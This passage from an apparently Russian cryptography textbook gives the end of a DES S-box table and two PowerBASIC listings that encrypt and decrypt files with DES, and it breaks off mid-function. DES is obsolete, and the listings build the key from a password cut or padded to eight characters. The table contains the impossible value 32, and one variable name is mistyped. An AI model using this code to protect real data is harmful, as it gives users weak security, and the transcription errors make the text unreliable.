0 | 12 | 1 | 10 | 15 | 9 | 2 | 6 | 8 | 0 | 13 | 3 | 4 | 14 | 7 | 5 | 11 | |||||||||||||||||
1 | 10 | 15 | 4 | 2 | 7 | 12 | 9 | 5 | 6 | 1 | 13 | 14 | 0 | 11 | 3 | 8 | |||||||||||||||||
2 | 9 | 14 | 15 | 5 | 2 | 8 | 12 | 3 | 7 | 0 | 4 | 10 | 1 | 13 | 11 | 6 | |||||||||||||||||
3 | 4 | 3 | 2 | 12 | 9 | 5 | 15 | 10 | 11 | 14 | 1 | 7 | 6 | 0 | 8 | 13 |
Окончание таблицы 18.7
S7 |
0 |
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
0 |
4 |
11 |
2 |
14 |
15 |
0 |
8 |
13 |
3 |
32 |
9 |
7 |
5 |
10 |
6 |
1 |
1 |
13 |
0 |
11 |
7 |
4 |
9 |
1 |
10 |
14 |
3 |
5 |
12 |
2 |
15 |
8 |
6 |
2 |
1 |
4 |
11 |
13 |
12 |
3 |
7 |
14 |
10 |
15 |
6 |
8 |
0 |
5 |
9 |
2 |
3 |
6 |
11 |
13 |
8 |
1 |
4 |
10 |
7 |
9 |
5 |
0 |
15 |
14 |
2 |
3 |
12 |
S8 |
0 |
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
0 |
13 |
2 |
8 |
4 |
6 |
15 |
11 |
1 |
10 |
9 |
3 |
14 |
5 |
0 |
12 |
7 |
1 |
1 |
15 |
13 |
8 |
10 |
3 |
7 |
4 |
12 |
5 |
6 |
11 |
0 |
14 |
9 |
2 |
2 |
7 |
11 |
4 |
1 |
9 |
12 |
14 |
2 |
0 |
6 |
10 |
13 |
15 |
3 |
5 |
8 |
3 |
2 |
1 |
14 |
7 |
4 |
10 |
8 |
13 |
15 |
12 |
9 |
0 |
3 |
5 |
6 |
11 |
Листинг 18.3. Пример реализации
алгоритма DES на языке Basic для шифрования файлов
$CPU 80386
$FLOAT NPX
$OPTIMIZE SPEED
$LIB ALL-
$OPTION CNTLBREAK ON
DECLARE FUNCTION MYBIN$ (n%)
DECLARE FUNCTION desalg$ (a$)
DECLARE SUB f (i%, a%(), x%())
DECLARE SUB transpose (datax%(), T%(), n%)
DECLARE SUB mrotate (keyx%())
DECLARE SUB stob (a$, mbits%())
DECLARE SUB btos (mbits%(), a$)
DECLARE SUB letbe (target%(), source%(), LAST%)
DECLARE SUB init (x() AS INTEGER, n%)
DECLARE SUB sboxinit (b() AS INTEGER)
DECLARE SUB xtob (a$, mbits%())
DIM s(1 TO 8, 1 TO 64) AS shared INTEGER
Продолжение листинга 18.3
' Инициализация
RESTORE InitialTrl
DIM InitialTr(1 TO 64) AS shared INTEGER
init InitialTr(), 64
RESTORE FinalTrl
DIM FinalTr( 1 TO 64) AS shared INTEGER
init FinalTr(), 64
RESTORE swappyl
DIM swappy(1 TO 64) AS shared INTEGER
init swappy(), 64
RESTORE KeyTr1l
DIM KeyTr1(1 TO 56) AS shared INTEGER
init KeyTr1(), 56
RESTORE KeyTr2l
DIM KeyTr2(1 TO 48) AS shared INTEGER
init KeyTr2(), 48
RESTORE etrl
DIM etr(1 TO 48) AS shared INTEGER
init etr(), 48
RESTORE ptrl
DIM ptr(1 TO 32) AS shared INTEGER
init ptr(), 32
sboxinit s()
RESTORE rotsl
DIM rots(1 TO 16) AS shared INTEGER
init rots(), 16
DIM XR(1 TO 56) AS shared INTEGER
DIM EF(1 TO 64) AS shared INTEGER
DIM ikeyf(1 TO 64) AS shared INTEGER
DIM yf(1 TO 64) AS shared INTEGER
Продолжение листинга 18.3
DIM ades(1 TO 64) AS shared INTEGER
DIM bdes(1 TO 64) AS shared INTEGER
DIM xdes(1 TO 64) AS shared INTEGER
DIM XT(1 TO 64) AS shared INTEGER
DIM P2(1 TO 64) AS shared INTEGER
' Главная программа
main:
CLS
parm$ = ltrim$(rtrim$(COMMAND$))+" "
IF LEN(parm$) > 1 THEN
Plainf$ = LTRIM$(RTRIM$(LEFT$(parm$, INSTR(parm$, " "))))
PRINT "Исходный файл : "; Plainf$
ELSE
INPUT "Исходный файл : ", plainf$
END IF
if len(plainf$)=0 then
print : print "СБОЙ: введите имя файла!"
system
end if
OPEN plainf$ FOR RANDOM AS 1
lof1& = LOF(1)
IF lof1& = 0 THEN
CLOSE #1
KILL plainf$
PRINT : PRINT "Файл не найден!";
SYSTEM
ELSE
IF lof1& > 9999999 THEN PRINT : PRINT "Исходный файл слишком велик!": SYSTEM
CLOSE #1
OPEN plainf$ for binary access read as #1
END IF
cipherf$ = ""
sp0% = 0: sp% = 0
DO
sp0% = sp%
sp% = INSTR(sp% + 1, plainf$, "\")
Продолжение листинга 18.3
LOOP WHILE sp% > 0
bplainf$ = RIGHT$(plainf$, LEN(plainf$) - (sp0%))
PRINT "Сохраняемое имя файла: "; bplainf$
pp% = INSTR(sp0% + 1, plainf$, ".")
IF pp% = 0 THEN
dcipherf$ = plainf$ + ".DES"
ELSE
dcipherf$ = LEFT$(plainf$, pp% - 1) + ".DES"
END IF
PRINT " По умолчанию : "; dcipherf$
INPUT "Выходной файл : ", cipherf$
IF cipherf$ = "" THEN cipherf$ = dcipherf$
OPEN cipherf$ FOR RANDOM AS 2
IF LOF(2) > 0 THEN
CLOSE #2
PRINT : PRINT "Выходной файл уже существует!"
SYSTEM
ELSE
CLOSE #2
OPEN cipherf$ FOR binary AS 2
END IF
PW$ = ""
LOCATE 9, 1
INPUT ; " Пароль : ", PW$
IF (LEN(PW$) < 8) THEN PW$ = PW$ + STRING$(8 - LEN(PW$), 0)
IF len(pw$) = 16 then
LOCATE 9, 8: PRINT "Пароль : "; STRING$(16, 15); STRING$(10, " ")
PW$ = ucase$(PW$)
xtob PW$, P2()
ELSE
LOCATE 9, 8: PRINT "Пароль : "; STRING$(8, 15); STRING$(10, " ")
PW$ = LEFT$(PW$, 8)
stob PW$, P2()
end IF
Продолжение листинга 18.3
transpose P2(), KeyTr1(), 56
ciphertekst$ = ""
blocks& = lof1& \ 256
w = RND(-INT(TIMER))
anything$ = ""
FOR i% = 1 TO 12
anything$ = anything$ + CHR$(128 + INT(127 * RND(1)))
NEXT i%
header$ = "#" + LTRIM$(STR$(lof1&))
header$ = "DES" + LEFT$(anything$, 8 - LEN(header$)) + header$
header$ = header$ + RIGHT$(anything$, 12 - LEN(bplainf$)) +
"#" + bplainf$
cheader$=desalg$(left$(header$,8))+desalg$(MID$(header$,9,8))+desalg$(right$(header$,8))
put$ #2, cheader$
LOCATE 10, 8: PRINT ; "Шифрование: 0 %";
inblock$=space$(256)
FOR n& = 1 TO blocks&
get$ #1,256,inblock$
outblock$=""
for b%=1 to 256 step 8
outblock$ = outblock$+desalg$(mid$(inblock$,b%,8))
next
Put$ #2, outblock$
LOCATE 10, 19: PRINT ; USING "###"; (n& / blocks&) * 100;
NEXT n&
rest1 = lof1& MOD 256
rest2 = lof1& MOD 8
rest = rest1-rest2
IF rest1 > 0 THEN
outblock$=""
get$ #1,rest1,inblock$
Продолжение листинга 18.3
if rest2 > 0 then
inblock$=inblock$+left$(anything$,(8-rest2))
end if
for b%=1 to len(inblock$) step 8
outblock$ = outblock$+desalg$(mid$(inblock$,b%,8))
next
Put$ #2, outblock$
END IF
CLOSE
LOCATE 10, 19: PRINT "100 % завершено"
PRINT : PRINT "Шифрование по алгоритму DES завершено."
SYSTEM
' Данные и функции
InitialTrl:
DATA 58,50,42,34,26,18,10,02,60,52,44,36,28,20,12,04
DATA 62,54,46,38,30,22,14,06,64,56,48,40,32,24,16,08
DATA 57,49,41,33,25,17,09,01,59,51,43,35,27,19,11,03
DATA 61,53,45,37,29,21,13,05,63,55,47,39,31,23,15,07
FinalTrl:
DATA 40,08,48,16,56,24,64,32,39,07,47,15,55,23,63,31
DATA 38,06,46,14,54,22,62,30,37,05,45,13,53,21,61,29
DATA 36,04,44,12,52,20,60,28,35,03,43,11,51,19,59,27
DATA 34,02,42,10,50,18,58,26,33,01,41,09,49,17,57,25
swappyl:
DATA 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48
DATA 49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64
DATA 01,02,03,04,05,06,07,08,09,10,11,12,13,14,15,16
DATA 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
KeyTr1l:
DATA 57,49,41,33,25,17,09,01,58,50,42,34,26,18,10,02
DATA 59,51,43,35,27,19,11,03,60,52,44,36
DATA 63,55,47,39,31,23,15,07,62,54,46,38,30,22,14,06
DATA 61,53,45,37,29,21,13,05,28,20,12,04
Продолжение листинга 18.3
KeyTr2l:
DATA 14,17,11,24,01,05,03,28,15,06,21,10,23,19,12,04
DATA 26,08,16,07,27,20,13,02,41,52,31,37,47,55,30,40
DATA 51,45,33,48,44,49,39,56,34,53,46,42,50,36,29,32
etrl:
DATA 32,01,02,03,04,05,04,05,06,07,08,09,08,09,10,11
DATA 12,13,12,13,14,15,16,17,16,17,18,19,20,21,20,21
DATA 22,23,24,25,24,25,26,27,28,29,28,29,30,31,32,01
ptrl:
DATA 16,07,20,21,29,12,28,17,01,15,23,26,05,18,31,10
DATA 02,08,24,14,32,27,03,09,19,13,30,06,22,11,04,25
sboxesl:
DATA 14,04,13,01,02,15,11,08,03,10,06,12,05,09,00,07
DATA 00,15,07,04,14,02,13,01,10,06,12,11,09,05,03,08
DATA 04,01,14,08,13,06,02,11,15,12,09,07,03,10,05,00
DATA 15,12,08,02,04,09,01,07,05,11,03,14,10,00,06,13
DATA 15,01,08,14,06,11,03,04,09,07,02,13,12,00,05,10
DATA 03,13,04,07,15,02,08,14,12,00,01,10,06,09,11,05
DATA 00,14,07,11,10,04,13,01,05,08,12,06,09,03,02,15
DATA 13,08,10,01,03,15,04,02,11,06,07,12,00,05,14,09
DATA 10,00,09,14,06,03,15,05,01,13,12,07,11,04,02,08
DATA 13,07,00,09,03,04,06,10,02,08,05,14,12,11,15,01
DATA 13,06,04,09,08,15,03,00,11,01,02,12,05,10,14,07
DATA 01,10,13,00,06,09,08,07,04,15,14,03,11,05,02,12
DATA 07,13,14,03,00,06,09,10,01,02,08,05,11,12,04,15
DATA 13,08,11,05,06,15,00,03,04,07,02,12,01,10,14,09
DATA 10,06,09,00,12,11,07,13,15,01,03,14,05,02,08,04
DATA 03,15,00,06,10,01,13,08,09,04,05,11,12,07,02,14
DATA 02,12,04,01,07,10,11,06,08,05,03,15,13,00,14,09
DATA 14,11,02,12,04,07,13,01,05,00,15,10,03,09,08,06
DATA 04,02,01,11,10,13,07,08,15,09,12,05,06,03,00,14
DATA 11,08,12,07,01,14,02,13,06,15,00,09,10,04,05,03
Продолжение листинга 18.3
DATA 12,01,10,15,09,02,06,08,00,13,03,04,14,07,05,11
DATA 10,15,04,02,07,12,09,05,06,01,13,14,00,11,03,08
DATA 09,14,15,05,02,08,12,03,07,00,04,10,01,13,11,06
DATA 04,03,02,12,09,05,15,10,11,14,01,07,06,00,08,13
DATA 04,11,02,14,15,00,08,13,03,12,09,07,05,10,06,01
DATA 13,00,11,07,04,09,01,10,14,03,05,12,02,15,08,06
DATA 01,04,11,13,12,03,07,14,10,15,06,08,00,05,09,02
DATA 06,11,13,08,01,04,10,07,09,05,00,15,14,02,03,12
DATA 13,02,08,04,06,15,11,01,10,09,03,14,05,00,12,07
DATA 01,15,13,08,10,03,07,04,12,05,06,11,00,14,09,02
DATA 07,11,04,01,09,12,14,02,00,06,10,13,15,03,05,08
DATA 02,01,14,07,04,10,08,13,15,12,09,00,03,05,06,11
rotsl:
DATA 1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1
SUB btos (mbits() AS INTEGER, a$)
a$ = ""
FOR i% = 1 TO 8
w% = 0
FOR j% = 1 TO 8
w% = w% + ((mbits(((i% - 1) * 8) + j%)) * (2 ^ (8 - j%)))
NEXT j%
a$ = a$ + CHR$(w%)
NEXT i%
END SUB
FUNCTION desalg$ (a$)
temp$ = ""
stob a$, ades()
transpose ades(), InitialTr(), 64
FOR i% = 1 TO 16
letbe bdes(), ades(), 64
FOR j% = 1 TO 32
ades(j%) = bdes(j% + 32)
NEXT j%
f i%, ades(), xdes()
FOR j% = 1 TO 32
ades(j% + 32) = (bdes(j%) + xdes(j%)) MOD 2
Продолжение листинга 18.3
NEXT j%
NEXT i%
transpose ades(), swappy(), 64
transpose ades(), FinalTr(), 64
btos ades(), temp$
desalg$ = temp$
END FUNCTION
SUB f (i%, a() AS INTEGER, x() AS INTEGER)
h% = i%: letbe EF(), a(), 64
transpose EF(), etr(), 48
FOR j% = 1 TO rots(h%)
mrotate P2()
NEXT j%
letbe ikeyf(), P2(), 64: transpose ikeyf(), KeyTr2(), 48
FOR j% = 1 TO 48
yf(j%) = (EF(j%) + ikeyf(j%)) MOD 2
NEXT j%
FOR k% = 1 TO 8
k6% = 6 * k%: k4% = 4 * k%
r% = (32 * yf(k6% - 5)) + (16 * yf(k6%)) + (8 * yf(k6% - 4)) + (4 * yf(k6% - 3)) + (2 * yf(k6% - 2)) + yf(k6% - 1) + 1
x(k4% - 3) = (s(k%, r%) \ 8) MOD 2: x(k4% - 2) = (s(k%, r%) \ 4) MOD 2
x(k4% - 1) = (s(k%, r%) \ 2) MOD 2: x(k4%) = s(k%, r%) MOD 2
NEXT k%
transpose x(), ptr(), 32
END SUB
SUB init (x() AS INTEGER, n%)
FOR i% = 1 TO n%
READ x(i%)
NEXT i%
END SUB
SUB letbe (target() AS INTEGER, source() AS INTEGER, LAST%)
FOR i% = 1 TO LAST%
target(i%) = source(i%)
NEXT i%
END SUB
Продолжение листинга 18.3
FUNCTION MYBIN$ (n%)
LOCAL ST$
p% = n%
ST$=""
FOR i% = 1 TO 8
IF (p% MOD 2) THEN
ST$ = "1" + ST$
ELSE
ST$ = "0" + ST$
END IF
p% = p% \ 2
NEXT i%
MYBIN$ = ST$
END FUNCTION
SUB mrotate (keyr() AS INTEGER)
letbe XR(), keyr(), 56
FOR i% = 1 TO 55
XR(i%) = XR(i% + 1)
NEXT i%
XR(28) = keyr(1): XR(56) = keyr(29)
letbe keyr(), XR(), 56
END SUB
SUB sboxinit (b() AS INTEGER)
RESTORE sboxesl
FOR i% = 1 TO 8
FOR j% = 1 TO 64
READ b(i%, j%)
NEXT j%
NEXT i%
END SUB
SUB stob (a$, mbits() AS INTEGER)
FOR i% = 1 TO 8
b$ = MYBIN$(ASC(MID$(a$, i%, 1)))
FOR j% = 1 TO 8
mbits(((i% - 1) * 8) + j%) = ASC(MID$(b$, j%, 1)) - 48
NEXT j%
NEXT i%
END SUB
Продолжение листинга 18.3
SUB transpose (datax() AS INTEGER, T() AS INTEGER, n%)
letbe XT(), datax(), 64
FOR i% = 1 TO n%
datax(i%) = XT(T(i%))
NEXT i%
END SUB
SUB xtob (a$, mbits() AS INTEGER)
LOCAL X$,NIBBLE$
FOR i% = 1 to 16
X$ = MID$(a$,i%,1)
SELECT CASE X$
CASE "0"
NIBBLE$ = "0000"
CASE "1"
NIBBLE$ = "0001"
CASE "2"
NIBBLE$ = "0010"
CASE "3"
NIBBLE$ = "0011"
CASE "4"
NIBBLE$ = "0100"
CASE "5"
NIBBLE$ = "0101"
CASE "6"
NIBBLE$ = "0110"
CASE "7"
NIBBLE$ = "0111"
CASE "8"
NIBBLE$ = "1000"
CASE "9"
NIBBLE$ = "1001"
CASE "A"
NIBBLE$ = "1010"
CASE "B"
NIBBLE$ = "1011"
CASE "C"
NIBBLE$ = "1100"
CASE "D"
NIBBLE$ = "1101"
CASE "E"
Окончание листинга 18.3
NIBBLE$ = "1110"
CASE "F"
NIBBLE$ = "1111"
CASE ELSE
Print "Не является 16-ричным значением!"
SYSTEM
END SELECT
FOR j% = 1 to 4
mbits(((i% - 1) * 4) + j%) = ASC(MID$(NIBBLE$, j%, 1)) - 48
NEXT j%
NEXT i%
END SUB
Листинг 18.4. Пример реализации алгоритма
DES на языке Basic для расшифровывания файлов
$CPU 80386
$FLOAT NPX
$OPTIMIZE SPEED
$LIB ALL-
$OPTION CNTLBREAK ON
DECLARE FUNCTION MYBIN$ (n%)
DECLARE FUNCTION desalg$ (a$)
DECLARE SUB f (i%, a%(), x%())
DECLARE SUB transpose (datax%(), T%(), n%)
DECLARE SUB mrotate (keyx%())
DECLARE SUB stob (a$, mbits%())
DECLARE SUB btos (mbits%(), a$)
DECLARE SUB letbe (target%(), source%(), last%)
DECLARE SUB init (x() AS INTEGER, n%)
DECLARE SUB sboxinit (b() AS INTEGER)
DECLARE SUB xtob (a$, mbits%())
DIM s(1 TO 8, 1 TO 64) AS shared INTEGER
' Инициализация
RESTORE InitialTrl
Продолжение листинга 18.4
DIM InitialTr(1 TO 64) AS shared INTEGER
init InitialTr(), 64
RESTORE FinalTrl
DIM FinalTr(1 TO 64) AS shared INTEGER
init FinalTr(), 64
RESTORE swappyl
DIM swappy(1 TO 64) AS shared INTEGER
init swappy(), 64
RESTORE KeyTr1l
DIM KeyTr1(1 TO 56) AS shared INTEGER
init KeyTr1(), 56
RESTORE KeyTr2l
DIM KeyTr2(1 TO 48) AS shared INTEGER
init KeyTr2(), 48
RESTORE etrl
DIM etr(1 TO 48) AS shared INTEGER
init etr(), 48
RESTORE ptrl
DIM ptr(1 TO 32) AS shared INTEGER
init ptr(), 32
sboxinit s()
RESTORE rotsl
DIM rots(1 TO 16) AS shared INTEGER
init rots(), 16
DIM XR(1 TO 56) AS shared INTEGER
DIM EF(1 TO 64) AS shared INTEGER
DIM ikeyf(1 TO 64) AS shared INTEGER
DIM yf(1 TO 64) AS shared INTEGER
DIM ades(1 TO 64) AS shared INTEGER
DIM bdes(1 TO 64) AS shared INTEGER
Продолжение листинга 18.4
DIM xdes(1 TO 64) AS shared INTEGER
DIM XT(1 TO 64) AS shared INTEGER
DIM P2(1 TO 64) AS shared INTEGER
main:
CLS
parm$ = ltrim$(rtrim$(COMMAND$))+" "
IF LEN(parm$) > 1 THEN
cipherf$ = LTRIM$(RTRIM$(LEFT$(parm$, INSTR(parm$, " "))))
PRINT "Имя зашифрованного файла : "; cipherf$
ELSE
INPUT "Имя расшифрованного файла : ", cipherf$
END IF
if len(cipherf$)=0 then
print : print "СБОЙ: введите имя файла!"
system
end if
OPEN cipherf$ FOR RANDOM AS 1
lof1& = LOF(1)
IF lof1& = 0 THEN
CLOSE #1
KILL cipherf$
PRINT : PRINT "Файл не найден!";
SYSTEM
ELSE
CLOSE #1
OPEN cipherf$ for binary access read as #1
END IF
PW$ = ""
LOCATE 6, 1
INPUT " Пароль : ", PW$
IF (LEN(PW$) < 8) THEN PW$ = PW$ + STRING$(8 - LEN(PW$), 0)
IF len(pw$) = 16 then
LOCATE 6, 1: PRINT " Пароль : ";
STRING$(16, 15); STRING$(10, " ")
Продолжение листинга 18.4
PW$ = ucase$(PW$)
xtob PW$, P2()
ELSE
LOCATE 6, 1: PRINT " Пароль : ";
STRING$(8, 15); STRING$(10, " ")
PW$ = LEFT$(PW$, 8)
stob PW$, P2()
END IF
PRINT " Проверка пароля : ";
transpose P2(), KeyTr1(), 56
get$ #1,24,cheader$
header$ = desalg$(LEFT$(cheader$, 8))
IF NOT (LEFT$(header$, 3) = "DES") THEN
PRINT "Неверен!": PRINT : PRINT "Неправильный пароль или ";
cipherf$; " не является зашифрованным файлом!"
SYSTEM
ELSE
PRINT "Верен!"
END IF
PRINT " Проверка длины файла :";
header$ = header$ + desalg$(MID$(cheader$, 9, 8))
header$ = header$ + desalg$(RIGHT$(cheader$, 8))
pl% = INSTR(header$, "#")
le$ = MID$(header$, pl% + 1, (11 - pl%))
lf& = VAL(le$)
ev& = lf& + 24
IF (ev& MOD 8) THEN ev& = ev& + 8 - (ev& MOD 8)
rescue% = 0
IF (ev& <> lof1&) THEN
PRINT "Неверна!! (возможна потеря данных)"
PRINT " Длина исходного файла :"; lf&
PRINT " Длина указанного файла :"; lof1&
PRINT " Длина файла должна быть :"; ev&
INPUT ; "Попытаться восстановить? (y/n) : ", q$:
IF (INSTR(q$, "N") OR (INSTR(q$, "n"))) THEN SYSTEM
rescue% = 4: PRINT
ELSE
PRINT lf&; ", Верна!"
END IF
Продолжение листинга 18.4
pl% = INSTR(12, header$, "#")
oldplainf$ = RIGHT$(header$, 24 - pl%)
PRINT " Имя исходного файла : "; oldplainf$;
OPEN oldplainf$ FOR RANDOM AS 2
IF INSTR(oldplainf$, ".") THEN
PRINT " ([*.*] ";
ELSE
PRINT " ([*] ";
END IF
IF LOF(2) > 0 THEN PRINT "уже есть в каталоге";
PRINT ")"
CLOSE #2
plainf$ = ""
INPUT " Имя выходного файла : ", plainf$
IF plainf$ = "" THEN plainf$ = oldplainf$
plainf$ = RTRIM$(LTRIM$(plainf$))
IF INSTR(plainf$, "*.") THEN
IF INSTR(oldplainf$, ".") THEN
plainf$ = LEFT$(plainf$, INSTR(plainf$, "*.") - 1) + LEFT$(oldplainf$, INSTR(oldplainf$, ".")) + RIGHT$(plainf$, LEN(plainf$) - INSTR(plainf$, "*.") - 1)
ELSE
plainf$ = LEFT$(plainf$, INSTR(plainf$, "*.") - 1) + oldplainf$ + RIGHT$(plainf$, LEN(plainf$) - INSTR(plainf$, "*."))
END IF
END IF
IF (RIGHT$(plainf$, 1) = "*") THEN
IF plainf$ = "*" THEN
plainf$ = oldplainf$
ELSE
IF (MID$(plainf$, LEN(plainf$) - 1, 1) = ".") THEN
plainf$ = LEFT$(plainf$, INSTR(plainf$, ".") - 1) +
RIGHT$(oldplainf$, LEN(oldplainf$) -
INSTR(oldplainf$, ".") + 1)
ELSE
plainf$ = LEFT$(plainf$, LEN(plainf$) - 1) + oldplainf$
END IF
END IF
END IF
IF RIGHT$(plainf$, 1) = "\" THEN plainf$ = plainf$ + oldplainf$
Продолжение листинга 18.4
OPEN plainf$ FOR RANDOM AS 2
IF LOF(2) > 0 THEN
CLOSE #2
PRINT : PRINT "Уже есть файл с таким именем!"
SYSTEM
ELSE
CLOSE #2
OPEN plainf$ FOR BINARY AS 2
END IF
plaintekst$ = ""
blocks& = (LOF(1) \ 8) - 3
LOCATE rescue% + 11, 21: PRINT ; "Расшифровывание : 0 %";
bigblocks&=(blocks&-1) \ 32
large$=space$(256)
FOR m& = 1 TO bigblocks&
outblock$=""
get$ #1,256,large$
for o%=1 to 256 step 8
outblock$=outblock$+desalg$(mid$(large$,o%,8))
next
put$ #2,outblock$
LOCATE rescue% + 11, 32: PRINT ; USING "###"; (m& / (bigblocks&+1)) * 100;
next
FOR n& = (bigblocks&*32)+1 TO blocks& - 1
GET$ #1,8,ciphertekst$
plaintekst$ = desalg$(ciphertekst$)
PUT$ #2, plaintekst$
LOCATE rescue% + 11, 32: PRINT ; USING "###"; (n& / blocks&) * 100;
NEXT n&
get$ #1,8,ciphertekst$
if len(ciphertekst$) > 0 then
plaintekst$ = desalg$(ciphertekst$)
IF rescue% THEN
last$ = plaintekst$
ELSE
Продолжение листинга 18.4
last$ = LEFT$(plaintekst$, lf& + 32 - LOF(1))
END IF
IF LEN(last$) > 0 THEN
PUT$ #2, last$
END IF
end if
CLOSE
LOCATE 11 + rescue%, 32: PRINT "100 % готово": PRINT
IF rescue% THEN
PRINT " Попытайтесь другим способом расшифровать этот файл."
ELSE
PRINT "Расшифровывание по алгоритму DES завершено."
END IF
SYSTEM
' Данные и функции
InitialTrl:
DATA 58,50,42,34,26,18,10,02,60,52,44,36,28,20,12,04
DATA 62,54,46,38,30,22,14,06,64,56,48,40,32,24,16,08
DATA 57,49,41,33,25,17,09,01,59,51,43,35,27,19,11,03
DATA 61,53,45,37,29,21,13,05,63,55,47,39,31,23,15,07
FinalTrl:
DATA 40,08,48,16,56,24,64,32,39,07,47,15,55,23,63,31
DATA 38,06,46,14,54,22,62,30,37,05,45,13,53,21,61,29
DATA 36,04,44,12,52,20,60,28,35,03,43,11,51,19,59,27
DATA 34,02,42,10,50,18,58,26,33,01,41,09,49,17,57,25
swappyl:
DATA 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48
DATA 49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64
DATA 01,02,03,04,05,06,07,08,09,10,11,12,13,14,15,16
DATA 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
KeyTr1l:
DATA 57,49,41,33,25,17,09,01,58,50,42,34,26,18,10,02
DATA 59,51,43,35,27,19,11,03,60,52,44,36
DATA 63,55,47,39,31,23,15,07,62,54,46,38,30,22,14,06
DATA 61,53,45,37,29,21,13,05,28,20,12,04
Продолжение листинга 18.4
KeyTr2l:
DATA 14,17,11,24,01,05,03,28,15,06,21,10,23,19,12,04
DATA 26,08,16,07,27,20,13,02,41,52,31,37,47,55,30,40
DATA 51,45,33,48,44,49,39,56,34,53,46,42,50,36,29,32
etrl:
DATA 32,01,02,03,04,05,04,05,06,07,08,09,08,09,10,11
DATA 12,13,12,13,14,15,16,17,16,17,18,19,20,21,20,21
DATA 22,23,24,25,24,25,26,27,28,29,28,29,30,31,32,01
ptrl:
DATA 16,07,20,21,29,12,28,17,01,15,23,26,05,18,31,10
DATA 02,08,24,14,32,27,03,09,19,13,30,06,22,11,04,25
sboxesl:
DATA 14,04,13,01,02,15,11,08,03,10,06,12,05,09,00,07
DATA 00,15,07,04,14,02,13,01,10,06,12,11,09,05,03,08
DATA 04,01,14,08,13,06,02,11,15,12,09,07,03,10,05,00
DATA 15,12,08,02,04,09,01,07,05,11,03,14,10,00,06,13
DATA 15,01,08,14,06,11,03,04,09,07,02,13,12,00,05,10
DATA 03,13,04,07,15,02,08,14,12,00,01,10,06,09,11,05
DATA 00,14,07,11,10,04,13,01,05,08,12,06,09,03,02,15
DATA 13,08,10,01,03,15,04,02,11,06,07,12,00,05,14,09
DATA 10,00,09,14,06,03,15,05,01,13,12,07,11,04,02,08
DATA 13,07,00,09,03,04,06,10,02,08,05,14,12,11,15,01
DATA 13,06,04,09,08,15,03,00,11,01,02,12,05,10,14,07
DATA 01,10,13,00,06,09,08,07,04,15,14,03,11,05,02,12
DATA 07,13,14,03,00,06,09,10,01,02,08,05,11,12,04,15
DATA 13,08,11,05,06,15,00,03,04,07,02,12,01,10,14,09
DATA 10,06,09,00,12,11,07,13,15,01,03,14,05,02,08,04
DATA 03,15,00,06,10,01,13,08,09,04,05,11,12,07,02,14
DATA 02,12,04,01,07,10,11,06,08,05,03,15,13,00,14,09
DATA 14,11,02,12,04,07,13,01,05,00,15,10,03,09,08,06
DATA 04,02,01,11,10,13,07,08,15,09,12,05,06,03,00,14
DATA 11,08,12,07,01,14,02,13,06,15,00,09,10,04,05,03
Продолжение листинга 18.4
DATA 12,01,10,15,09,02,06,08,00,13,03,04,14,07,05,11
DATA 10,15,04,02,07,12,09,05,06,01,13,14,00,11,03,08
DATA 09,14,15,05,02,08,12,03,07,00,04,10,01,13,11,06
DATA 04,03,02,12,09,05,15,10,11,14,01,07,06,00,08,13
DATA 04,11,02,14,15,00,08,13,03,12,09,07,05,10,06,01
DATA 13,00,11,07,04,09,01,10,14,03,05,12,02,15,08,06
DATA 01,04,11,13,12,03,07,14,10,15,06,08,00,05,09,02
DATA 06,11,13,08,01,04,10,07,09,05,00,15,14,02,03,12
DATA 13,02,08,04,06,15,11,01,10,09,03,14,05,00,12,07
DATA 01,15,13,08,10,03,07,04,12,05,06,11,00,14,09,02
DATA 07,11,04,01,09,12,14,02,00,06,10,13,15,03,05,08
DATA 02,01,14,07,04,10,08,13,15,12,09,00,03,05,06,11
rotsl:
DATA 1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1
SUB btos (mbits() AS INTEGER, a$)
a$ = ""
FOR i% = 1 TO 8
w% = 0
FOR j% = 1 TO 8
w% = w% + ((mbits(((i% - 1) * 8) + j%)) * (2 ^ (8 - j%)))
NEXT j%
a$ = a$ + CHR$(w%)
NEXT i%
END SUB
FUNCTION desalg$ (a$)
temp$ = "": stob a$, ades()
transpose ades(), InitialTr(), 64
transpose ades(), swappy(), 64
FOR i% = 16 TO 1 STEP -1
letbe bdes(), ades(), 64
f i%, bdes(), xdes()
FOR j% = 1 TO 32
ades(j%) = (bdes(j% + 32) + xdes(j%)) MOD 2
NEXT j%
FOR j% = 33 TO 64
ades(j%) = bdes(j% - 32)
Продолжение листинга 18.4
NEXT j%
NEXT i%
transpose ades(), FinalTr(), 64
btos ades(), temp$
desalg$ = temp$
END FUNCTION
SUB f (i%, a() AS INTEGER, x() AS INTEGER)
h% = i%: letbe EF(), a(), 64
transpose EF(), etr(), 48
letbe ikeyf(), P2(), 64
transpose ikeyf(), KeyTr2(), 48
FOR j% = 1 TO rots(h%)
mrotate P2()
NEXT j%
FOR j% = 1 TO 48
yf(j%) = (EF(j%) + ikeyf(j%)) MOD 2
NEXT j%
FOR k% = 1 TO 8
k6% = 6 * k%: k4% = 4 * k%
r% = (32 * yf(k6% - 5)) + (16 * yf(k6%)) + (8 * yf(k6% - 4)) + (4 * yf(k6% - 3)) + (2 * yf(k6% - 2)) + yf(k6% - 1) + 1
x(k4% - 3) = (s(k%, r%) \ 8) MOD 2: x(k4% - 2) = (s(k%, r%) \ 4) MOD 2
x(k4% - 1) = (s(k%, r%) \ 2) MOD 2: x(k4%) = s(k%, r%) MOD 2
NEXT k%
transpose x(), ptr(), 32
END SUB
SUB init (x() AS INTEGER, n%)
FOR i% = 1 TO n%
READ x(i%)
NEXT i%
END SUB
SUB letbe (target() AS INTEGER, source() AS INTEGER, last%)
FOR il% = 1 TO last%
target(il%) = source(il%)
NEXT il%
END SUB
Продолжение листинга 18.4
FUNCTION MYBIN$ (n%)
STS$ = ""
p% = n%
FOR i% = 1 TO 8
IF (p% MOD 2) THEN
ST$ = "1" + ST$
